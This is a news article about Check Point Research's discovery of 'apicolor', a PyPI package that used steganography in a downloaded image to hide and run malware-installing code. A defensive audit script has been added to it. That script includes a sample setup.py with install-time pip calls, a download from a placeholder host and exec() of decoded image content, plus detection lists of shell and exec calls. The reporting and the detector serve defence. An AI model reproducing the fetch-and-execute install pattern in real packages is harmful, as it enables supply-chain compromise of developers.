Thursday, November 14, 2024

Malicious Python Package Relies on Steganography to Download Malware



Check Point Research has detected a malicious open source code package that uses steganography to hide malicious code inside image files.

The malicious package was available on PyPI, a package index widely used by Python developers. After being notified of it, PyPI's maintainers removed the malicious package.

The malicious package, apicolor, looks like one of many development packages available on PyPI. The header states the package is a "core lib for REST API." The package installation script for apicolor has instructions to download additional packages (requests and judyb), along with a picture from the Web. The script then uses the steganography capabilities in judyb to uncover and execute the malicious code hidden inside the image file. The malicious code downloads malware from the Web and installs it on the user's machine.
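One way a defender could triage a source distribution for the install-time behaviour described above, as an added example that is not code from the article or the researchers: a static check that parses a setup.py without running it and flags install-time pip calls, remote image URLs and dynamic execution. The sample script, its URL, its version string and the judyb function name are constructed placeholders.

```python
import ast

# Constructed sample mirroring the install script described above; the URL and
# the judyb function name are placeholders, not taken from the real package.
SAMPLE_SETUP = '''\
import os
from setuptools import setup
os.system("pip install requests")
os.system("pip install judyb")
import requests, judyb
img = requests.get("https://example.invalid/pic.png").content
exec(judyb.hypothetical_decode(img))
setup(name="apicolor", version="0.0.0")
'''

IMAGE_EXT = (".png", ".jpg", ".jpeg", ".gif", ".bmp")
SHELL_CALLS = {"os.system", "os.popen", "subprocess.run", "subprocess.call",
               "subprocess.check_call", "subprocess.check_output", "subprocess.Popen"}
DYNAMIC_EXEC = {"exec", "eval", "compile"}

def dotted(node):
    """Return 'a.b.c' for a Name/Attribute chain, '' for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if not isinstance(node, ast.Name):
        return ""
    return ".".join(reversed(parts + [node.id]))

def audit_setup(source):
    """Parse (never run) a setup.py and return sorted (line, finding) pairs."""
    findings = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = dotted(node.func)
            strings = [c.value for c in ast.walk(node)
                       if isinstance(c, ast.Constant) and isinstance(c.value, str)]
            if name in SHELL_CALLS:
                pip = any("pip" in s and "install" in s for s in strings)
                findings.add((node.lineno, "pip install at install time" if pip
                              else "shell command at install time"))
            elif name in DYNAMIC_EXEC:
                findings.add((node.lineno, "dynamic code execution"))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            url = node.value.lower().split("?")[0]
            if url.startswith(("http://", "https://")) and url.endswith(IMAGE_EXT):
                findings.add((node.lineno, "remote image URL"))
    return sorted(findings)

if __name__ == "__main__":
    for line, finding in audit_setup(SAMPLE_SETUP):
        print(f"setup.py:{line}: {finding}")
```

Any single finding is only a prompt for manual review; the combination of all three in one install script is the pattern the report describes.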

The impact appears minimal: Check Point Research found only three GitHub users including apicolor and judyb in their code, and a little over 80 projects containing the malicious packages. The infection method relies on people stumbling across these open source projects and installing them on their machines, "not knowing it brings in a malicious package import," the team said.

The more important takeaway? "These findings reflect careful planning and thought by a threat actor, who proves that obfuscation techniques on PyPI have evolved," Check Point Research wrote on the team's blog.

Attackers are no longer just relying on the tactic of copying and renaming existing packages and hiding malicious code inside. Instead, they're targeting certain types of users, often those working from home and those using corporate machines for side projects, according to the research team.

